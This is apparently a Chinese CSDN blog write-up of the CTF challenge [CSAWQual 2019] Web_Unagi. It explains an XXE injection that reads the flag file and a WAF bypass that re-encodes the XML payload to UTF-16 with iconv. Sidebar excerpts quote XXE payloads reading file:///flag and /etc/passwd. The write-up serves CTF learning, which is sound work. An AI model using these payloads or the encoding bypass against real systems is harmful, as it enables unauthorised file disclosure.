BUUCTF:[CSAWQual 2019]Web_Unagi -- xxe 简单的外部实体bypass ,编码绕过,

最新推荐文章于 2024-05-31 11:48:50 发布
最新推荐文章于 2024-05-31 11:48:50 发布
阅读量647 收藏
点赞数
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zero_Adam/article/details/115520781
版权
该博客介绍了在BUUCTF中遇到的一道CSAWQual 2019 Web_Unagi题目,涉及XXE漏洞的利用。由于UTF8上传可能遇到WAF,作者采用了UTF16编码进行绕过。文章提到了如何通过PHP的伪协议如`php://filter`来执行命令,强调在遇到`file:///flag`不起作用的情况时可以尝试多种方法。博客的WP部分提示读者要从实战中学习,通过特定的XML语句实现文件上传。
摘要由CSDN通过智能技术生成

二、学的的

  1. 这个好像是xxe的那啥,默认技巧吧,,utf8上传说有waf,然后就换成utf16进行上传
  2. 最近做的xxe的题,都是简单的每waf的。外部实体注入就好了,,,
  3. 注意,如果,system的命令 file:///flag。不好使的时候,还可用 PHP的伪协议来做,php://filer/这些来,到时候多试试就好了

三、 WP

初末

看一下iconv命令吧,总不能一个题什么都没学到东西啊,

语句:

iconv -f utf8 -t utf16 test.xml -o aaa.xml

这个语句弄上去,生成的文件上传也好使,


这个也行, 用了 Linux的标准输入输出而已,

iconv -f utf8 -t utf16 2.xml>1.xml

好了, 这两个语法够用了
在这里插入图片描述

Zero_Adam
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xxe编码绕过(8-19)
Realiy的博客
08-19 1683
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能绕过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
buuctf 简单学习xxe
m0_46580995的博客
11-08 1223
buuctf 抓包发现可以xxe payload <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file://文件"> ]> <user> <username>&file;</username> <password>hack</password> </user&g
buuctf [PHP]XXE
qq_1873822的博客
03-14 3649
原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息。仅仅是纯文本,有能力处理纯文本的软件都可以处理 XML。XML 允许创作者定义自己的标签和自己的文档结构。XML 是独立于软件和硬件的信息传输工具。所有现代浏览器都有读取和操作 XML 的内建 XML 解析器,但是不同的浏览器解析的方法不一样的,如在IE中使用loadXML()方法,在其他
[CSAWQual 2019]Web_Unagi
最新发布
2302_79839194的博客
05-31 336
且在About中告诉我们了,flag位于 /flag ==> 使用file协议直接读取本地文件**(这里指的是,我们上传文件给服务器,服务器解析文件,读取的是服务器的本地文件,也就是flag文件)**|:管道符,将前一个的结果(2.xml文件内容),作为下一个命令的输入 ==> 将内容进行编码的转换。发现是xml数据格式,且存在上传文件的功能 => 联想到 XXE注入(引用外部实体)-t:指定输出文件的编码格式是UTF-16BE(大端字节序)-f:指定输入文件(2.xml)是UTF-8编码格式。
BUUCTF-Real-[PHP]XXE
分享
01-31 939
BUUCTF-Real-[PHP]XXE漏洞复现!
XXE的理解与绕过
weixin_50464560的博客
11-30 1563
转载至https://www.freebuf.com/articles/web/291094.html 前置知识XXE如何理解?它是可扩展标记语言 ( XML) 用于存储和传输数据。通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。目前JSON的使用比XML更加普遍。JSON和XML都被用于在Ajax模型中的XML技术。这种标记语言允许开发人员定义和表示任意数据结构的HTML。以下为定义属性和值的Security Ass
unagi:搜索和下载Hyper Suprime-Cam(HSC)斯巴鲁战略调查(SSP)中的数据
05-02
除了是世界上最美味的鱼的一个, unagi还可以帮助您通过浏览或了Hyper Suprime-CAM(HSC)斯巴鲁战略方案(SSP的,也被称为HSC测量)-使用8.2m斯巴鲁望远镜上的超棒初焦摄像头进行的雄心勃勃的多波段深测光测量。...
-Unagi-Ingress-Hackathon
02-14
【标题】"-Unagi-Ingress-Hackathon" 指的可能是一场以"Unagi Ingress"为主题的黑客马拉松活动,参与者可能需要利用技术解决与Ingress游戏相关的挑战。Ingress是一款由Niantic开发的增强现实游戏,玩家分为两个阵营...
unagi-chan:haskell库,使用类似于Chan的API为x86实现快速且可扩展的并发队列
02-04
`Unagi-chan` 是一个针对Haskell编程语言设计的并发库,它提供了一种高效、可扩展的并发队列实现。这个库的主要目标是为x86架构的系统提供类似`Chan`的API,`Chan`是Haskell中用于并发编程的基本构建块。在深入探讨`...
Python库 | unagi-0.1.3.dev3.tar.gz
05-24
资源分类:Python库 所属语言:Python 资源全名:unagi-0.1.3.dev3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
unliftio-messagebox:快速可靠的消息队列
05-10
基于unliftio unagi-chan子集的薄包装纸。 该项目中的单元测试和基准测试锻炼了unagi-chan ,因此希望该库的用户不必为此担心。 该项目还旨在隐式验证unagi-chan某些部分。 总体目标是即使在大量并发程序中也可以...
XXE和XML利用和绕过
qq_49078152的博客
07-19 823
XXE和XML
buuctf-Real-[PHP-XXE]
weixin_46079186的博客
05-09 1241
题目地址 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 用burp抓包,在后方修改加入payload payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> &
WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 892
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXE是XML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize
scrawman的博客
01-27 2900
[CSAWQual 2019]Web_Unagi 看提示有告诉你xml的格式 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <password>passwd2</passwor
buuoj [PHP]XXE
pondzhang的专栏
05-04 1281
答案就在phpinfo()页面,无需通过xxe注入获得
------已搬运-------xxe入门学习--------BUUCTF:[NCTF2019]Fake(True) XML cookbook---------jarvisoj的API调用
Zero_Adam的博客
02-16 461
目录:一、XML基础知识:二、应用场景:例题:1. buu的[NCTF2019]Fake XML cookbook2. jarvisoj的API调用 一、XML基础知识: 这两个都不错 https://blog.csdn.net/gavin_john/article/details/51532756 https://blog.csdn.net/bylfsj/article/details/101441734 这个就离谱。直接xxe全部学完了,学精通了,,暂时不用看这个,, https://xz.aliyun
php string ctf,PHP字符解析特性绕WAF【buuctf题 easy calc】
weixin_39939601的博客
03-11 305
一、PHP字符串解析特性PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会:1.删除空白符2.将某些字符转换为下划线(包括空格)例如,/?%20news[id%00=42会转换为Array([news_id] => 42),然后参数%20news[id%00的值将存储到$_GET["news_id"]中。(URL编码%20是空格,%00是0)例如:User inputDec...
BUUCTF解析
qq_63676207的博客
02-21 507
easyre 1 这个在IDI中打开用 SHIFT+F12 查看字符串窗口发现flag reverse1 下好后是一个压缩包的形式于是解压后查看是一个exe文件倒是不能用 接着用IDI打开并SHIFT+F12 查看字符串窗口 发现flag进行跟进 再次跟进 发现flag 提示是hello_world 并且与Str2函数有关F5查看 发现有一个for循环并包含一个if比较 字符与数字选中数字+R进行转义 及意思是将o变成0 得到flag{hell0_...
[CSAWQual 2019]Unagi
07-27
回答: 在CSAWQual 2019比赛中,关于Unagi的问题,根据引用\[1\]、\[2\]和\[3\]的内容,Unagi是一个涉及XML注入的题目。参赛者需要利用之前的XXE模板或者自己构造的XML文件,通过上传恶意的XML文件来获取flag。具体的操作是将文件名改为1.xml,然后上传即可得到flag。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [[CSAWQual 2019]Web_Unagi xxe转码绕过waf](https://blog.csdn.net/qq_54929891/article/details/124481254)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[CSAWQual 2019]Web_Unagi](https://blog.csdn.net/m0_62905261/article/details/126189583)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [BUUCTF [CSAWQual 2019]Web_Unagi 1](https://blog.csdn.net/weixin_45642610/article/details/120201638)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值